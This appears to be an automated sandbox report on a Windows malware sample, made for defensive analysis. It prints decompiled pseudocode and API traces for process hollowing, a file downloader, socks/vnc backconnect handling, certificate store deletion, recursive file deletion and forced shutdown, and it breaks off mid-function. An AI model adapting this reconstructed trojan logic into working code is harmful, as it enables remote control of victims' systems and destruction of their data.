NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00408DE4

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

GetProcessId.KERNEL32(?), ref: 00408E20

Part of subcall function 00406296: CreateMutexW.KERNEL32(00422568,00000001,?,004227A8,7519F560,?,00000002,?,7519F560), ref: 004062E7
Part of subcall function 00406296: GetLastError.KERNEL32 ref: 004062F3
Part of subcall function 00406296: CloseHandle.KERNEL32(00000000), ref: 00406301

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00408E72
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00408EB2
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00408EC8
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00408ED1

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
String ID:
API String ID: 1044471028-0
Opcode ID: 6cd64fc88610fa7c5df98b3670bf4007e06aac17af041047f674bb8b29e0d2e3
Instruction ID: cc393bde3a605ccd65a9f28b7d6fc14248cc6d3d8a760380cb6fd85c1d62b871
Opcode Fuzzy Hash: 6cd64fc88610fa7c5df98b3670bf4007e06aac17af041047f674bb8b29e0d2e3
Instruction Fuzzy Hash: F0315A3150021AABDF129F64CE48BDA7BB9AF08304F04816AFD49F22A1D775D864DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00413803, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413803(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E00411991(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E00416D1C(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E004119C1(_v20);
				goto L13;
			}

0x00413820
0x00413829
0x0041382e
0x004138ce
0x004138d4
0x004138d4
0x00413839
0x0041383e
0x00413843
0x004138ba
0x004138bb
0x004138c4
0x004138c9
0x004138c9
0x00000000
0x004138c4
0x00413845
0x00413848
0x00413875
0x00000000
0x00000000
0x0041387a
0x004138a8
0x004138ae
0x00000000
0x004138ae
0x00413890
0x00000000
0x00000000
0x00413892
0x00413898
0x00000000
0x00000000
0x0041389a
0x004138a3
0x00000000
0x00000000
0x00000000
0x004138a5
0x004138b5
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 00413823
WaitForSingleObject.KERNEL32(?,00000000), ref: 00413851
InternetReadFile.WININET(00001000,?,00001000,?), ref: 0041386D
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00413888
FlushFileBuffers.KERNEL32(00000000), ref: 004138A8
CloseHandle.KERNEL32(00000000), ref: 004138BB

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: 2cd49833f24bb0a1dff1144cacaaa1f0ca22c210300cc3271a12d1a49f59b436
Instruction ID: 865450c59f5bbcd3c9aebacedb04134417acda3f689cbd4c4471300e088ba0a8
Opcode Fuzzy Hash: 2cd49833f24bb0a1dff1144cacaaa1f0ca22c210300cc3271a12d1a49f59b436
Instruction Fuzzy Hash: 98216071900149BFEF11AF94DC84BEE7BB5EB04312F1444AAF551B11A0C3798EC59B29

Uniqueness

Uniqueness Score: -1.00%

Function 00412C66, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0041728D,00000000,00000000,00000001,F0000040,00000000,0041728D,?,00000030,?,?,?,004177A6,?), ref: 00412C7F
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,004177A6,?), ref: 00412C97
CryptHashData.ADVAPI32(?,00000010), ref: 00412CB3
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00412CCB
CryptDestroyHash.ADVAPI32(?), ref: 00412CE2
CryptReleaseContext.ADVAPI32(?,00000000,?,?,004177A6,?), ref: 00412CEC

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: f6c96499aeac1828cf42449b75cbee90bb6f10f2b86170372dac768f02de4296
Instruction ID: 46d244a8a143b35931b169639559f22b60be7f6312723319923349c042e6472b
Opcode Fuzzy Hash: f6c96499aeac1828cf42449b75cbee90bb6f10f2b86170372dac768f02de4296
Instruction Fuzzy Hash: 9611277180024CBFEF119B94DE84EEE7B3DFB04344F004462F651E0160D7768EA5AB68

Uniqueness

Uniqueness Score: -1.00%

Function 00404F00, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00404F00(void* __ecx, CHAR** _a4, signed int _a7) {
				signed int _v6;
				signed int _v8;
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				short _v30;
				intOrPtr _v36;
				char _v44;
				char _v304;
				char _v788;
				char _v792;
				void* __edi;
				void* __esi;
				int _t68;
				signed short _t70;
				signed int _t80;
				void* _t95;
				signed int _t99;
				void* _t102;
				signed int _t108;
				void* _t112;
				CHAR** _t121;
				signed int _t130;
				intOrPtr* _t131;
				intOrPtr* _t138;
				signed int _t139;
				void* _t141;

				_t123 = __ecx;
				E00411A74( &_v304,  &_v304, 0, 0x104);
				_t121 = _a4;
				if(lstrcmpiA( *_t121, ?str?) != 0) {
					_t68 = lstrcmpiA( *_t121, "vnc");
					__eflags = _t68;
					if(_t68 != 0) {
						_t70 = E00412040( *_t121, _t123, 0);
						_t6 = _t70 - 1; // -1
						_t123 = _t6;
						__eflags = _t6 - 0xfffd;
						if(_t6 > 0xfffd) {
							L32:
							E00415AC2( &_v304);
							_a7 = 0;
							if(_v304 <= 0) {
								L34:
								E004119C1( *_t121);
								E004119C1(_t121[1]);
								E004119C1(_t121[2]);
								E00415194(_t121[3]);
								E004119C1(_t121);
								return 0;
							} else {
								goto L33;
							}
							do {
								L33:
								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
								_a7 = _a7 + 1;
							} while (_a7 < _v304);
							goto L34;
						}
						_t80 = _t70 & 0x0000ffff;
						_v24 = _t80;
						__eflags = _t80;
						if(_t80 == 0) {
							goto L32;
						}
						L6:
						_t130 = E00414A4A(E00412040(_t121[2], _t123, 0), _t123, _t121[1]);
						_v16 = _t130;
						if(_t130 == 0xffffffff) {
							goto L32;
						}
						E00414DBC(_t123, _t130);
						E00414D7A(_t130);
						_t89 = E00412818(E00406619(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
						_t144 = _t89;
						if(_t89 == 0) {
							L31:
							E00414D64(_t89, _t130);
							goto L32;
						}
						_v9 = E00418059( &_v788, _v36, _t144, _t130, 1, _v44);
						_t89 = E00412806( &_v44);
						if(_v9 == 0) {
							goto L31;
						}
						_t89 = E00414C71(0,  &_v16, 0, 0);
						_t130 = _v16;
						if(_t89 != _t130) {
							goto L31;
						}
						while(1) {
							_push(0x7530);
							_push( &_v8);
							_t95 = 4;
							if(E00414974(_t95, _t130) == 0 || _v8 <= 4) {
								break;
							}
							_t138 = E00411991(_v8 & 0x0000ffff);
							_push(0x7530);
							if(_t138 == 0) {
								_t127 = _v8 & 0x0000ffff;
								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
								L29:
								_push(_t99);
								_push(_t130);
								_t89 = E004149BC(_t127);
								break;
							}
							_push(_t138);
							_t127 = _t130;
							_t102 = E00414974((_v8 & 0x0000ffff) - 4, _t130);
							_push(_t138);
							if(_t102 == 0) {
								L35:
								_t89 = E004119C1();
								break;
							}
							_v30 = _v6;
							_v28 =  *_t138;
							E004119C1();
							if(_v6 != 0) {
								_t139 = E00411991(_v6 & 0x0000ffff);
								_t99 = _v6 & 0x0000ffff;
								_push(0x7530);
								__eflags = _t139;
								if(_t139 == 0) {
									goto L29;
								}
								_push(_t139);
								_t127 = _t130;
								_t108 = E00414974(_t99, _t130);
								__eflags = _t108;
								if(_t108 == 0) {
									_push(_t139);
									goto L35;
								}
								_v20 = _t139;
								L20:
								if(_v28 == 2 && _v30 == 4) {
									_t112 = 0xc;
									_t131 = E00411991(_t112);
									if(_t131 != 0) {
										 *_t131 = _a4;
										 *((intOrPtr*)(_t131 + 4)) = _v24;
										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
										if(E00415A7D( &_v304, 0x20000, E00404C77, _t131) == 0) {
											E004119C1(_t131);
										}
									}
									E00415A2B(_t127,  &_v304);
								}
								E004119C1(_v20);
								_t89 = E00414C71(0,  &_v16, 0, 0);
								_t130 = _v16;
								if(_t89 == _t130) {
									continue;
								} else {
									break;
								}
							}
							_v20 = _v20 & 0x00000000;
							goto L20;
						}
						_t121 = _a4;
						goto L31;
					}
					_v24 = 0xfffffffe;
					goto L6;
				}
				_v24 = _v24 | 0xffffffff;
				goto L6;
			}

0x00404f00
0x00404f1a
0x00404f1f
0x00404f33
0x00404f42
0x00404f44
0x00404f46
0x00404f55
0x00404f5a
0x00404f5a
0x00404f5d
0x00404f63
0x0040513c
0x00405142
0x0040514e
0x00405152
0x00405173
0x00405175
0x0040517d
0x00405185
0x0040518d
0x00405193
0x0040519e
0x00000000
0x00000000
0x00000000
0x00405154
0x00405154
0x0040515f
0x00405165
0x0040516b
0x00000000
0x00405154
0x00404f69
0x00404f6c
0x00404f6f
0x00404f71
0x00000000
0x00000000
0x00404f77
0x00404f89
0x00404f8b
0x00404f91
0x00000000
0x00000000
0x00404f98
0x00404f9e
0x00404fbb
0x00404fc0
0x00404fc2
0x00405135
0x00405137
0x00000000
0x00405137
0x00404fd9
0x00404fdc
0x00404fe5
0x00000000
0x00000000
0x00404ff5
0x00404ffa
0x00404fff
0x00000000
0x00000000
0x0040500a
0x0040500a
0x0040500e
0x00405011
0x0040501b
0x00000000
0x00000000
0x00405035
0x00405037
0x0040503a
0x00405123
0x00405127
0x0040512b
0x0040512b
0x0040512c
0x0040512d
0x00000000
0x0040512d
0x00405047
0x00405048
0x0040504a
0x0040504f
0x00405052
0x004051a1
0x004051a1
0x00000000
0x004051a1
0x0040505c
0x00405062
0x00405065
0x0040506f
0x00405080
0x00405082
0x00405086
0x00405087
0x00405089
0x00000000
0x00000000
0x0040508f
0x00405090
0x00405092
0x00405097
0x00405099
0x004051a8
0x00000000
0x004051a8
0x0040509f
0x004050a2
0x004050a6
0x004050b1
0x004050b7
0x004050bb
0x004050c0
0x004050c5
0x004050de
0x004050e8
0x004050eb
0x004050eb
0x004050e8
0x004050f6
0x004050f6
0x004050fe
0x0040510d
0x00405112
0x00405117
0x00000000
0x0040511d
0x00000000
0x0040511d
0x00405117
0x00405071
0x00000000
0x00405071
0x00405132
0x00000000
0x00405132
0x00404f48
0x00000000
0x00404f48
0x00404f35
0x00000000

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 00404F2F
lstrcmpiA.KERNEL32(?,vnc), ref: 00404F42
CloseHandle.KERNEL32(?), ref: 0040515F

Part of subcall function 00415A7D: SetLastError.KERNEL32(0000009B,00406914,00000000,0040A2E5,00000000,00422428,00000000,00000104,7519F560,00000000), ref: 00415A87

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Strings

vnc, xrefs: 00404F3B
socks, xrefs: 00404F28

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$CloseErrorFreeHandleHeapLast
String ID: socks$vnc
API String ID: 3305036421-270151703
Opcode ID: 42aac4decd2699af289818a9dfe128f835b9f118a0ec79afc61e422d361caaf4
Instruction ID: 988e49d09041c5c484af7f334a99a86d297549a2af317fb943c67cef3be06b51
Opcode Fuzzy Hash: 42aac4decd2699af289818a9dfe128f835b9f118a0ec79afc61e422d361caaf4
Instruction Fuzzy Hash: 0371E3B0900119AACF11AB61C851BFF77B5AF45318F14416BF990BB2D2D73C8E81DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041702F, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041702F(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E00417246("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E00416E4B( &(_v596.cFileName)) == 0 && E00417246( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E00416D1C( &_v1116);
						} else {
							E0041702F( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0041703d
0x00417051
0x004170cc
0x004170d2
0x004170e9
0x004170e9
0x00417066
0x0041706b
0x00000000
0x00000000
0x00000000
0x00000000
0x0041706d
0x0041706d
0x0041707b
0x00417093
0x0041709b
0x004170ad
0x0041709d
0x004170a1
0x004170a1
0x0041709b
0x004170c1
0x004170c6
0x00000000

APIs

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00417060
FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 004170BB
FindClose.KERNEL32(00000000,?,00000000), ref: 004170C6
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,00000000), ref: 004170D2
RemoveDirectoryW.KERNEL32(?,?,00000000), ref: 004170D9

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: e1c2cf4ed822b666a53f6116dbe028b8f9a9dd249274b5cef5d43ffe2d23dc26
Instruction ID: b5b67577d1f55d0c6655d1032714e5d4f8981eee0e93925d4e6b35615e7dd0dd
Opcode Fuzzy Hash: e1c2cf4ed822b666a53f6116dbe028b8f9a9dd249274b5cef5d43ffe2d23dc26
Instruction Fuzzy Hash: A311B6320083045AC720EB64DC49ADB7BFC9F49314F04462FB995D3190DB789989865A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C85B, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00403408), ref: 0040C866
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040C87F
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,00000001,00406A76), ref: 0040C88A
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040C892
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040C89E

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: a50def23fd487ae4cdc798def6369d1f485d2fa0676be072f0d98902bc9cc757
Instruction ID: 849acb84cbcaa08620e1f90765fdb4e8be935ed35cb3fefef8b7c6d1ebceab6c
Opcode Fuzzy Hash: a50def23fd487ae4cdc798def6369d1f485d2fa0676be072f0d98902bc9cc757
Instruction Fuzzy Hash: DCF0A032281215AAD62127755E58FAB7B5CDB42B92B084233FA88F22A09E38C841856C

Uniqueness

Uniqueness Score: -1.00%

Function 0040A8D1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040A8D1() {
				signed int _v124;
				signed char _t12;
				unsigned int _t15;
				void* _t23;
				void* _t24;

				_t12 =  *0x422a6c; // 0x0
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E0041CF1D(_t23, _t24, __eflags);
						_t12 =  *0x422a6c; // 0x0
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E0041308D(L"SeShutdownPrivilege");
						_t15 =  *0x422a6c; // 0x0
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E00419CE5( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x422530 =  *0x422530 | 0x00000010;
						E00419D3D( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x0040a8d4
0x0040a8de
0x0040a903
0x0040a905
0x0040a907
0x0040a90c
0x0040a90c
0x0040a911
0x0040a913
0x0040a93e
0x0040a940
0x00000000
0x00000000
0x00000000
0x0040a915
0x0040a91a
0x0040a91f
0x0040a931
0x0040a936
0x0040a93d
0x0040a93d
0x0040a8e0
0x0040a8e4
0x0040a8eb
0x0040a8ed
0x0040a8f1
0x0040a8fc
0x0040a942
0x00000000
0x0040a949
0x0040a950
0x0040a950
0x0040a950

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040A936

Part of subcall function 00419CE5: CreateMutexW.KERNEL32(00422568,00000000,00423D10,?,?,0041D677,?,?,?,743C152E,00000002), ref: 00419D0B

ExitWindowsEx.USER32 ref: 0040A949

Strings

, xrefs: 0040A8ED
SeShutdownPrivilege, xrefs: 0040A915

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: 41b3d583e88ac20afeee7f1fd9a8a54d78279eed80a24d85a5e97d91cad76904
Instruction ID: 3750101232593ca24a29cf56d1ca985bb666f9d05db0c1e7de212708b9366d22
Opcode Fuzzy Hash: 41b3d583e88ac20afeee7f1fd9a8a54d78279eed80a24d85a5e97d91cad76904
Instruction Fuzzy Hash: 6AF0F97170030469EE2097B45D4AFFA3B6C9B00748F50043AF991F25F2D7789A528A6D

Uniqueness

Uniqueness Score: -1.00%

Function 0041848E, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0041848E(void* __edx, intOrPtr _a4) {
				signed int _v12;
				int _v16;
				void* _v20;
				int _v24;
				signed int _v28;
				int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v74;
				intOrPtr _v78;
				char _v80;
				struct _SYSTEMTIME _v96;
				char _v112;
				short _v184;
				short _v288;
				void* __ebx;
				void* __esi;
				signed int _t127;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t143;
				signed int _t151;
				signed int _t155;
				signed int _t159;
				signed char _t163;
				signed int _t167;
				signed int _t176;
				signed int _t177;
				signed int _t186;
				long _t191;
				long _t195;
				signed int _t201;
				void* _t202;
				signed int _t203;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				short* _t230;
				signed int _t238;
				intOrPtr _t239;
				void* _t244;

				_t239 = _a4;
				_t126 =  *((intOrPtr*)(_t239 + 0x40));
				if( *((intOrPtr*)(_t239 + 0x40)) != 0) {
					_t127 = E0041752D( &_v12, __edx, __eflags, _t126, 0x4e27, 0x10000000);
					 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
					 *(_t239 + 0x38) =  *(_t239 + 0x38) & 0x00000000;
					_t238 = _t127;
					_v64 = _t238;
					__eflags = _t238;
					if(_t238 == 0) {
						L55:
						E004119C1(_v64);
						__eflags = 0 -  *(_t239 + 0x3c);
						asm("sbb eax, eax");
						return  ~0x00000000;
					}
					_t131 = _v12;
					__eflags = _t131 - 0x10;
					if(_t131 <= 0x10) {
						goto L55;
					}
					__eflags =  *((char*)(_t239 + 0x18)) - 1;
					_v16 = 1;
					_t132 = _t131 + _t238;
					__eflags = _t132;
					_v28 = ((0 |  *((char*)(_t239 + 0x18)) != 0x00000001) - 0x00000001 & 0xffffffe0) + 0x00000040 & 0x0000ffff;
					_v12 = _t132;
					while(1) {
						_t133 =  *(_t238 + 2) & 0x0000ffff;
						__eflags = _t133 - 0x10;
						if(_t133 < 0x10) {
							goto L55;
						}
						_t219 =  *(_t238 + 4) & 0x0000ffff;
						__eflags = _t219 - _t133;
						if(_t219 >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 6) - _t133;
						if( *(_t238 + 6) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 8) - _t133;
						if( *(_t238 + 8) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xa) - _t133;
						if( *(_t238 + 0xa) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xc) - _t133;
						if( *(_t238 + 0xc) >= _t133) {
							goto L55;
						}
						__eflags =  *(_t238 + 0xe) - _t133;
						if( *(_t238 + 0xe) >= _t133) {
							goto L55;
						}
						_t134 =  *_t238 & 0x0000ffff;
						_t208 = _t134 >> 0x00000009 & 0x00000008;
						_t220 = _t238 + _t219;
						__eflags = (_t134 & _v28) - _v28;
						if((_t134 & _v28) != _v28) {
							L48:
							_t238 = _t238 + ( *(_t238 + 2) & 0x0000ffff);
							_t102 = _t238 + 0x10; // 0x10
							__eflags = _t102 - _v12;
							if(_t102 > _v12) {
								goto L55;
							}
							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
								goto L55;
							}
							_v16 = _v16 + 1;
							continue;
						}
						_t234 = _t208;
						_t140 = E0041816B(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
						__eflags = _t140;
						if(_t140 == 0) {
							goto L48;
						}
						_t141 =  *(_t239 + 0x44);
						__eflags =  *(_t239 + 0x44);
						if(__eflags == 0) {
							L16:
							_t142 =  *(_t238 + 8) & 0x0000ffff;
							__eflags = _t142;
							if(_t142 == 0) {
								L18:
								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
								__eflags = _t143;
								if(_t143 == 0) {
									L20:
									__eflags =  *_t238 & 0x00000010;
									if(( *_t238 & 0x00000010) == 0) {
										L31:
										E00411A74( &_v60,  &_v60, 0, 0x1c);
										_v60 =  *_t238 & 0x0000ffff;
										_t209 = _t208 | 0xffffffff;
										_v56 = E00411E1F(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
										_t151 =  *(_t238 + 6) & 0x0000ffff;
										__eflags = _t151;
										if(_t151 != 0) {
											__eflags = _t151 + _t238;
											_v52 = E00411E1F(_t209, _t151 + _t238);
										} else {
											_v52 = _v52 & 0x00000000;
										}
										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
										__eflags = _t155;
										if(_t155 != 0) {
											__eflags = _t155 + _t238;
											_v48 = E00411E1F(_t209, _t155 + _t238);
										} else {
											_v48 = _v48 & 0x00000000;
										}
										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
										__eflags = _t159;
										if(_t159 != 0) {
											__eflags = _t159 + _t238;
											_v44 = E00411E1F(_t209, _t159 + _t238);
										} else {
											_v44 = _v44 & 0x00000000;
										}
										_t163 =  *_t238 & 0x0000ffff;
										__eflags = _t163 & 0x00000003;
										if((_t163 & 0x00000003) != 0) {
											E004193CE( *(_t239 + 0x3c),  *(_t239 + 0x38));
											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
											_t167 = E00411A14(__eflags,  &_v60, 0x1c);
											 *(_t239 + 0x38) = _t167;
											__eflags = _t167;
											if(_t167 == 0) {
												E004193A5( &_v60);
												_t239 = _a4;
											} else {
												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
											}
											goto L55;
										} else {
											__eflags = _t163 & 0x0000000c;
											if(__eflags == 0) {
												E004193A5( &_v60);
												L47:
												_t239 = _a4;
												goto L48;
											}
											_t211 = E0041752D( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
											_v40 = _t211;
											__eflags = _t211;
											if(_t211 == 0) {
												L54:
												E004119C1(_t211);
												E004193A5( &_v60);
												_t239 = _a4;
												E004193CE( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
												_t122 = _t239 + 0x3c;
												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
												__eflags =  *_t122;
												goto L55;
											}
											_t176 = E00417BFF(_t211, _v36);
											__eflags = _t176;
											if(_t176 == 0) {
												goto L54;
											}
											_t177 = E0041194C(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
											__eflags = _t177;
											if(_t177 == 0) {
												goto L54;
											}
											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
											E004119FD( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
											goto L47;
										}
									}
									__eflags =  *(_t238 + 0xc);
									if( *(_t238 + 0xc) <= 0) {
										goto L31;
									}
									E004066FC( &_v184, _t220, 1,  &_v288);
									_t186 = E00412C66( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E004124FE(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
									__eflags = _t186;
									if(_t186 == 0) {
										goto L48;
									}
									_t230 =  &_v184;
									_t212 = 0;
									__eflags = 0;
									do {
										E00411D29( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
										_t212 = _t212 + 1;
										_t230 = _t230 + 4;
										__eflags = _t212 - 0x10;
									} while (_t212 < 0x10);
									_v32 = _v32 | 0xffffffff;
									_t208 = 0x10;
									 *_t230 = 0;
									_v24 = _t208;
									_v20 = 0x80000001;
									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
									__eflags = _t191;
									if(_t191 != 0) {
